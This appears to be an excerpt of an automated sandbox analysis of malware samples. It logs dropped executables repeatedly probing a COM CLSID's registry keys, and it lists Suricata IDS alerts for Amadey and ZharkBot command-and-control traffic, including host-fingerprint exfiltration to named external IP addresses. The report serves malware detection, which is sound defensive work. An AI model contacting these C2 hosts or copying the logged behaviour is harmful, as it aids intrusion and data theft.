Source:	Binary string: protobuf-net.pdb source: 52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49732 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49733 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49736 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49738 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49739 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49742 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49743 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49745 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49749 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49751 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49752 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49754 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49758 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49762 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49765 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49763 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49770 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49774 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49776 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49777 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49778 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49780 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49781 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49782 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49788 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49789 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49794 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49798 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49795 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49796 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49804 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49805 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49824 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2044597 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) M1 : 192.168.2.4:49830 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49799 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49786 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49785 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49757 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49793 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49792 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49746 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49773 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49783 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49810 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49800 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49772 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49813 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49844 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49818 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49850 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49821 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49859 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49867 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49869 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49847 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49879 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49854 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49884 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49874 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054413 - Severity 1 - ET MALWARE ZharkBot User-Agent Observed : 192.168.2.4:49877 -> 188.114.96.3:443
